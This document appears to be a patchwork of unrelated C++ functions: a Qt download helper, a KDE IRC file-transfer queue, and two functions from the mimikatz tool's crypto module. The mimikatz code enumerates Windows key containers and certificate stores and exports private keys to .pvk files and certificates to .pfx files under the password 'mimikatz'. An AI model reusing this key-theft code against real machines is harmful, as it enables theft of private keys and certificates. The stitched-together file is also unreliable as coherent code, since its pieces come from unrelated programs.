QString TheMagic::fileName()
{
if( mDownloadToFile )
{
sanitizeFileName();
return mFileName;
}
else
{
return tr("*Buffer*");
}
}
void TheMagic::downloadToFile()
{
sanitizeFileName();
mpFile = new QFile( mFileName );
if( !Settings::value( Settings::FunkytownOverwrite ) )
{
if( mpFile->exists() )
{
delete mpFile;
mpFile = 0;
}
}
if( mpFile && !(mpFile->open( QIODevice::WriteOnly )) )
{
delete mpFile;
mpFile = 0;
}
mDownloadToFile = true;
}
void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool exportKeys)
{
bool isMachine = false;
DWORD providerType = PROV_RSA_FULL;
wstring provider = MS_ENHANCED_PROV;
switch (arguments->size())
{
case 1:
isMachine = true;
case 0:
break;
case 3:
isMachine = true;
arguments->erase(arguments->begin());
case 2:
mod_cryptoapi::getProviderString(arguments->front(), &provider);
mod_cryptoapi::getProviderTypeFromString(arguments->back(), &providerType);
break;
default :
(*outputStream) << L"Erreur d\'arguments, attendu : [machine] [provider providerType]" << endl;
return;
}
wstring type = (isMachine ? L"machine" : L"user");
vector<wstring> * monVectorKeys = new vector<wstring>();
/* CryptoAPI */
(*outputStream) << L"[" << type << L"] Clés CryptoAPI :" << endl;
if(mod_cryptoapi::getVectorContainers(monVectorKeys, isMachine))
{
DWORD i;
vector<wstring>::iterator monContainer;
for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); ++monContainer, ++i)
{
(*outputStream) << L"\t - " << *monContainer << endl;
HCRYPTPROV hCryptKeyProv = NULL;
if(CryptAcquireContext(&hCryptKeyProv, monContainer->c_str(), provider.c_str(), providerType, NULL | (isMachine ? CRYPT_MACHINE_KEYSET : NULL)))
{
HCRYPTKEY maCle = NULL;
for(DWORD ks = AT_KEYEXCHANGE; (ks <= AT_SIGNATURE) && !maCle; ks++)
{
if(CryptGetUserKey(hCryptKeyProv, ks, &maCle))
{
(*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(ks) << endl;
DWORD param = 0, taille = sizeof(param);
if(CryptGetKeyParam(maCle, KP_PERMISSIONS, reinterpret_cast<BYTE *>(¶m), &taille, NULL))
(*outputStream) << L"\t\tExportabilité : " << (param & CRYPT_EXPORT ? L"OUI" : L"NON") << endl;
if(CryptGetKeyParam(maCle, KP_KEYLEN, reinterpret_cast<BYTE *>(¶m), &taille, NULL))
(*outputStream) << L"\t\tTaille clé : " << param << endl;
if(exportKeys)
{
bool reussite = false;
BYTE * monExport = NULL;
DWORD tailleExport = 0;
wstringstream monBuff;
wstring containerName = *monContainer;
sanitizeFileName(&containerName);
monBuff << L"capi_" << type << L'_' << i << L'_' << containerName << L".pvk";
if(mod_cryptoapi::getPrivateKey(maCle, &monExport, &tailleExport))
{
reussite = mod_crypto::PrivateKeyBlobToPVK(monExport, tailleExport, monBuff.str(), ks);
delete[] monExport;
}
(*outputStream) << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
if(!reussite)
{
(*outputStream) << L"\t\t\tmod_cryptoapi::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl;
}
}
}
}
if(maCle)
CryptDestroyKey(maCle);
else
(*outputStream) << L"\t\t* Erreur de clé ; " << mod_system::getWinError() << endl;
CryptReleaseContext(hCryptKeyProv, 0);
}
else (*outputStream) << L"\t\t* Erreur d\'acquisition de la clé ; " << mod_system::getWinError() << endl;
}
}
else (*outputStream) << L"mod_cryptoapi::getVectorContainers : " << mod_system::getWinError() << endl;
/* CryptoNG */
if(mod_cryptong::isNcrypt)
{
(*outputStream) << endl;
monVectorKeys->clear();
(*outputStream) << L"[" << type << L"] Clés CNG :" << endl;
if(mod_cryptong::getVectorContainers(monVectorKeys, isMachine))
{
DWORD i;
vector<wstring>::iterator monContainer;
for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); ++monContainer, ++i)
{
(*outputStream) << L"\t - " << *monContainer << endl;
NCRYPT_KEY_HANDLE maCle;
if(mod_cryptong::getHKeyFromName(*monContainer, &maCle, isMachine))
{
bool exportable = false;
DWORD size = 0;
if(mod_cryptong::isKeyExportable(&maCle, &exportable))
(*outputStream) << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl;
if(mod_cryptong::getKeySize(&maCle, &size))
(*outputStream) << L"\t\tTaille clé : " << size << endl;
if(exportKeys)
{
bool reussite = false;
BYTE * monExport = NULL;
DWORD tailleExport = 0;
wstringstream monBuff;
monBuff << L"cng_" << type << L'_' << i << L'_' << *monContainer << L".pvk";
if(mod_cryptong::getPrivateKey(maCle, &monExport, &tailleExport))
{
reussite = mod_crypto::PrivateKeyBlobToPVK(monExport, tailleExport, monBuff.str());
delete[] monExport;
}
(*outputStream) << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
if(!reussite)
{
(*outputStream) << L"\t\t\tmod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl;
}
}
mod_cryptong::NCryptFreeObject(maCle);
}
}
}
else (*outputStream) << L"mod_cryptong::getVectorContainers : " << mod_system::getWinError() << endl;
}
delete monVectorKeys;
}
bool DccTransferRecv::queue()
{
kdDebug() << "DccTransferRecv::queue()" << endl;
if ( getStatus() != Configuring )
return false;
if ( m_partnerIp.isEmpty() || m_partnerPort.isEmpty() )
return false;
if (!kapp->authorize("allow_downloading"))
{
//note we have this after the initialisations so that item looks okay
//Do not have the rights to send the file. Shouldn't have gotten this far anyway
failed(i18n("The admin has restricted the right to receive files"));
return false;
}
// check if the sender IP is valid
if ( m_partnerIp == "0.0.0.0" )
{
failed( i18n( "Invalid sender address (%1)" ).arg( m_partnerIp ) );
return false;
}
// TODO: should we support it?
if ( m_fileSize == 0 )
{
failed( i18n( "Unsupported negotiation (filesize=0)" ) );
return false;
}
if ( m_fileName.isEmpty() )
{
m_fileName = "unnamed_file";
}
if ( m_fileURL.isEmpty() )
{
// determine default incoming file URL
// set default folder
if ( !Preferences::dccPath().isEmpty() )
m_fileURL = KURL( Preferences::dccPath() );
else
m_fileURL.setPath( KUser( KUser::UseRealUserID ).homeDir() ); // default folder is *not* specified
// add a slash if there is none
m_fileURL.adjustPath( 1 );
// Append folder with partner's name if wanted
if ( Preferences::dccCreateFolder() )
m_fileURL.addPath( m_partnerNick + '/' );
// Just incase anyone tries to do anything nasty
QString fileNameSanitized = sanitizeFileName( m_fileName );
// Append partner's name to file name if wanted
if ( Preferences::dccAddPartner() )
m_fileURL.addPath( m_partnerNick + '.' + fileNameSanitized );
else
m_fileURL.addPath( fileNameSanitized );
}
return DccTransfer::queue();
}
void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * arguments, bool exportCert)
{
wstring monEmplacement = L"CERT_SYSTEM_STORE_CURRENT_USER";
wstring monStore = L"My";
if(arguments->size() == 1)
{
monEmplacement = arguments->front();
}
else if(arguments->size() == 2)
{
monEmplacement = arguments->front();
monStore = arguments->back();
}
(*outputStream) << L"Emplacement : \'" << monEmplacement << L'\'';
DWORD systemStore;
if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore))
{
(*outputStream) << L"\\" << monStore << endl;
if(HCERTSTORE hCertificateStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, NULL, NULL, systemStore | CERT_STORE_OPEN_EXISTING_FLAG | CERT_STORE_READONLY_FLAG, monStore.c_str()))
{
DWORD i;
PCCERT_CONTEXT pCertContext;
for (i = 0, pCertContext = CertEnumCertificatesInStore(hCertificateStore, NULL); pCertContext != NULL; pCertContext = CertEnumCertificatesInStore(hCertificateStore, pCertContext), i++)
{
wstring * certName = new wstring();
bool reussite = false;
if(!mod_crypto::getCertNameFromCertCTX(pCertContext, certName))
certName->assign(L"[empty]");
(*outputStream) << L"\t - " << *certName << endl;;
sanitizeFileName(certName);
wstringstream monBuff;
monBuff << monEmplacement << L'_' << monStore << L'_' << i << L'_' << *certName << L'.';
mod_crypto::KIWI_KEY_PROV_INFO keyProvInfo;
if(mod_crypto::getKiwiKeyProvInfo(pCertContext, &keyProvInfo))
{
(*outputStream) << L"\t\tContainer Clé : " << keyProvInfo.pwszContainerName << endl;
(*outputStream) << L"\t\tProvider : " << keyProvInfo.pwszProvName << endl;
HCRYPTPROV_OR_NCRYPT_KEY_HANDLE monProv = NULL;
DWORD keySpec = 0;
BOOL aFermer = false;
if(CryptAcquireCertificatePrivateKey(pCertContext, CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG /* CRYPT_ACQUIRE_SILENT_FLAG NULL */, NULL, &monProv, &keySpec, &aFermer))
{
(*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(keySpec) << endl;
DWORD size = 0;
bool exportable = false;
if(keySpec == CERT_NCRYPT_KEY_SPEC)
{
if(mod_cryptong::isNcrypt)
{
reussite = mod_cryptong::getKeySize(&monProv, &size);
reussite &=mod_cryptong::isKeyExportable(&monProv, &exportable);
if(aFermer)
{
mod_cryptong::NCryptFreeObject(monProv);
}
}
else (*outputStream) << L"\t\t\tErreur : Clé de type nCrypt, sans nCrypt ?" << endl;
}
else
{
DWORD tailleEcrite = 0;
DWORD exportability;
HCRYPTKEY maCle = NULL;
if(reussite = (CryptGetUserKey(monProv, keySpec, &maCle) != 0))
{
tailleEcrite = sizeof(DWORD);
reussite = (CryptGetKeyParam(maCle, KP_KEYLEN, reinterpret_cast<BYTE *>(&size), &tailleEcrite, NULL) != 0);
tailleEcrite = sizeof(DWORD);
reussite &= (CryptGetKeyParam(maCle, KP_PERMISSIONS, reinterpret_cast<BYTE *>(&exportability), &tailleEcrite, NULL) != 0);
exportable = (exportability & CRYPT_EXPORT) != 0;
}
if(aFermer)
{
CryptReleaseContext(monProv, 0);
}
}
if(reussite)
{
(*outputStream) << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl;
(*outputStream) << L"\t\tTaille clé : " << size << endl;
}
if(exportCert)
{
wstring PFXFile = monBuff.str();
PFXFile.append(L"pfx");
reussite = mod_crypto::CertCTXtoPFX(pCertContext, PFXFile, L"mimikatz");
(*outputStream) << L"\t\tExport privé dans \'" << PFXFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
if(!reussite)
{
(*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl;
}
}
}
else (*outputStream) << L"CryptAcquireCertificatePrivateKey : " << mod_system::getWinError() << endl;
}
if(exportCert)
{
wstring DERFile = monBuff.str();
DERFile.append(L"der");
reussite = mod_crypto::CertCTXtoDER(pCertContext, DERFile);
(*outputStream) << L"\t\tExport public dans \'" << DERFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
if(!reussite)
{
(*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl;
}
}
delete certName;
}
CertCloseStore(hCertificateStore, CERT_CLOSE_STORE_FORCE_FLAG);
}
else (*outputStream) << L"CertOpenStore : " << mod_system::getWinError() << endl;
}
else (*outputStream) << L" introuvable !" << endl;
}
